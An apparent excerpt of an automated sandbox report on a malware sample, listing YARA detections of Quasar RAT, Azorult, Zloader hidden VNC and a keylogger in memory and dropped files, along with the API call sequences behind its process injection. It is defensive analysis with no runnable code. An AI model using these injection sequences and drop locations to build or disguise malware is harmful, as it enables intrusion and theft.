Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: dropped/windef.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: dropped/windef.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: dropped/windef.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C7B11C GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,GetLastError,CloseHandle,GetKeyState,ExitWindowsEx,

5_2_00C7B11C

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: String function: 004034E4 appears 33 times

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,	4_2_00AB318A
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,	4_2_00AB2591
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError,	4_2_00AB27FB
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError,	4_2_00AB27C1
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64,	4_2_00AB31D4
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree,	4_2_00AB3509
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,	4_2_00AB2ED8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory,	4_2_00AB2B39
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB126D NtQueryVirtualMemory,	4_2_00AB126D
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,	5_2_00C64CC8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory,	5_2_00C64854
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,	5_2_00C63450
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA,	5_2_00C6502C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation,	5_2_00C82AC8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError,	5_2_00C636F8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError,	5_2_00C6528C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError,	5_2_00C652A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError,	5_2_00C636A8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount,	5_2_00C82E70
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,	5_2_00C64634
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy,	5_2_00C83FCC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree,	5_2_00C803EC

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
